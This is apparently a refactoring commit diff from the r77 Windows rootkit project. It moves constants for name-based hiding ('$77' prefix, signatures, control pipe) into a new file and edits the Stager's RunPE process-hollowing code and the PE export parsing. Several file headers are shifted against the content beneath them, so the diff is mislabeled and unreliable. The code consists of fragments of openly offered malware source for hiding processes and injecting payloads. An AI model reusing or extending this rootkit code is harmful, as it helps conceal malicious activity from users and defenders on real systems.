Refactoring

Author: bytecode77

BuildTask/BuildTask.csproj

@@ -41,6 +41,9 @@
     <Compile Include="..\Global\GlobalAssemblyInfo.cs">
       <Link>Properties\GlobalAssemblyInfo.cs</Link>
     </Compile>
+    <Compile Include="..\Global\R77Const.cs">
+      <Link>Properties\R77Const.cs</Link>
+    </Compile>
     <Compile Include="BuildTask.cs" />
   </ItemGroup>
   <ItemGroup />

Example/Example.csproj

@@ -62,6 +62,9 @@
     <Compile Include="..\Global\GlobalAssemblyInfo.cs">
       <Link>Properties\GlobalAssemblyInfo.cs</Link>
     </Compile>
+    <Compile Include="..\Global\R77Const.cs">
+      <Link>Properties\R77Const.cs</Link>
+    </Compile>
     <Compile Include="Properties\AssemblyInfo.cs" />
     <Page Include="MainWindow.xaml">
       <Generator>MSBuild:Compile</Generator>

Global/GlobalAssemblyInfo.cs

@@ -2,16 +2,4 @@
 
 [assembly: AssemblyVersion("1.4.3")]
 [assembly: AssemblyFileVersion("1.4.3")]
-[assembly: AssemblyCopyright("© bytecode77, 2023.")]
-
-namespace Global
-{
-	// These constants must match the preprocessor definitions in r77def.h
-	public static class Config
-	{
-		public const string HidePrefix = "$77";
-		public const ushort R77ServiceSignature = 0x7273;
-		public const ushort R77HelperSignature = 0x7268;
-		public const string ControlPipeName = HidePrefix + "control";
-	}
-}
+[assembly: AssemblyCopyright("© bytecode77, 2023.")]

Global/R77Const.cs

@@ -0,0 +1,11 @@
+namespace Global
+{
+	// These constants must match the preprocessor definitions in r77def.h
+	public static class Config
+	{
+		public const string HidePrefix = "$77";
+		public const ushort R77ServiceSignature = 0x7273;
+		public const ushort R77HelperSignature = 0x7268;
+		public const string ControlPipeName = HidePrefix + "control";
+	}
+}

Service/ProcessListener.h

@@ -27,9 +27,6 @@ typedef struct _NEW_PROCESS_LISTENER
 /// </summary>
 /// <param name="interval">The interval, in milliseconds, between each enumeration of running processes.</param>
 /// <param name="callback">The function that is called, when a process is found that was not present in the previous enumeration.</param>
-/// <returns>
-/// A pointer to the newly created NEW_PROCESS_LISTENER structure.
-/// </returns>
 VOID NewProcessListener(DWORD interval, PROCESSIDCALLBACK callback);
 static DWORD WINAPI NewProcessListenerThread(LPVOID parameter);
 

Stager/Helper.cs

@@ -25,8 +25,7 @@ public static bool Is64BitOperatingSystem()
 		{
 			using (Process process = Process.GetCurrentProcess())
 			{
-				bool wow64;
-				if (IsWow64Process(process.Handle, out wow64))
+				if (IsWow64Process(process.Handle, out bool wow64))
 				{
 					return wow64;
 				}

Stager/RunPE.cs

@@ -110,7 +110,10 @@ public static void Run(string path, string commandLine, byte[] payload, int pare
 					// If the current attempt failed, terminate the created process to not have suspended "leftover" processes.
 					Process.GetProcessById(processId).Kill();
 				}
-				catch { }
+				catch
+				{
+				}
+
 				continue;
 			}
 

Stager/Stager.csproj

@@ -38,6 +38,10 @@
   <PropertyGroup>
     <StartupObject />
   </PropertyGroup>
+  <PropertyGroup />
+  <PropertyGroup>
+    <Win32Resource>A:\Code\GitHub\r77-rootkit\Stager\Stager.res</Win32Resource>
+  </PropertyGroup>
   <ItemGroup>
     <Reference Include="System" />
   </ItemGroup>
@@ -64,6 +68,9 @@
   <ItemGroup>
     <None Include="Resources\Service64.exe" />
   </ItemGroup>
+  <ItemGroup>
+    <Content Include="Stager.res" />
+  </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
   <PropertyGroup>
     <PostBuildEvent>xcopy /Y "$(TargetPath)" "$(SolutionDir)Install\Resources"</PostBuildEvent>

Stager/Stager.res

@@ -67,6 +67,9 @@
     <Compile Include="..\Global\GlobalAssemblyInfo.cs">
       <Link>Properties\GlobalAssemblyInfo.cs</Link>
     </Compile>
+    <Compile Include="..\Global\R77Const.cs">
+      <Link>Properties\R77Const.cs</Link>
+    </Compile>
     <Compile Include="Controller\ConfigSystemEntry.cs" />
     <Compile Include="Controller\ConfigSystemDirectory.cs" />
     <Compile Include="Controller\ConfigSystem.cs" />

TestConsole/TestConsole.csproj

@@ -1,4 +1,4 @@
-
+
 Microsoft Visual Studio Solution File, Format Version 12.00
 # Visual Studio Version 17
 VisualStudioVersion = 17.1.32328.378
@@ -55,6 +55,7 @@ EndProject
 Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Global", "Global", "{054A9EE5-7740-4460-A561-D0AC8CF051EF}"
 	ProjectSection(SolutionItems) = preProject
 		Global\GlobalAssemblyInfo.cs = Global\GlobalAssemblyInfo.cs
+		Global\R77Const.cs = Global\R77Const.cs
 	EndProjectSection
 EndProject
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InstallShellcode", "InstallShellcode\InstallShellcode.vcxitems", "{DEAB25FD-2042-4BD6-BF4B-0802DCCC70F5}"

r77.sln

@@ -1,7 +1,7 @@
 #ifndef _R77DEF_H
 #define _R77DEF_H
 
-// These preprocessor definitions must match the constants in GlobalAssemblyInfo.cs
+// These preprocessor definitions must match the constants in r77Const.cs
 
 /// <summary>
 /// The prefix for name based hiding (e.g. processes, files, etc...).

r77api/r77def.h

@@ -684,10 +684,10 @@ BOOL IsExecutable64Bit(LPBYTE image, LPBOOL is64Bit)
 	{
 		switch (ntHeaders->OptionalHeader.Magic)
 		{
-			case 0x10b:
+			case IMAGE_NT_OPTIONAL_HDR32_MAGIC:
 				*is64Bit = FALSE;
 				return TRUE;
-			case 0x20b:
+			case IMAGE_NT_OPTIONAL_HDR64_MAGIC:
 				*is64Bit = TRUE;
 				return TRUE;
 		}
@@ -786,10 +786,20 @@ BOOL RunPE(LPCWSTR path, LPBYTE payload)
 DWORD GetExecutableFunction(LPBYTE image, LPCSTR functionName)
 {
 	BOOL is64Bit;
-	if (IsExecutable64Bit(image, &is64Bit) && BITNESS(is64Bit ? 64 : 32))
+	if (IsExecutable64Bit(image, &is64Bit))
 	{
-		PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(image + ((PIMAGE_DOS_HEADER)image)->e_lfanew);
-		PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)(image + RvaToOffset(image, ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress));
+		PIMAGE_EXPORT_DIRECTORY exportDirectory;
+		if (is64Bit)
+		{
+			PIMAGE_NT_HEADERS64 ntHeaders = (PIMAGE_NT_HEADERS64)(image + ((PIMAGE_DOS_HEADER)image)->e_lfanew);
+			exportDirectory = (PIMAGE_EXPORT_DIRECTORY)(image + RvaToOffset(image, ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress));
+		}
+		else
+		{
+			PIMAGE_NT_HEADERS32 ntHeaders = (PIMAGE_NT_HEADERS32)(image + ((PIMAGE_DOS_HEADER)image)->e_lfanew);
+			exportDirectory = (PIMAGE_EXPORT_DIRECTORY)(image + RvaToOffset(image, ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress));
+		}
+
 		LPDWORD nameDirectory = (LPDWORD)(image + RvaToOffset(image, exportDirectory->AddressOfNames));
 		LPWORD nameOrdinalDirectory = (LPWORD)(image + RvaToOffset(image, exportDirectory->AddressOfNameOrdinals));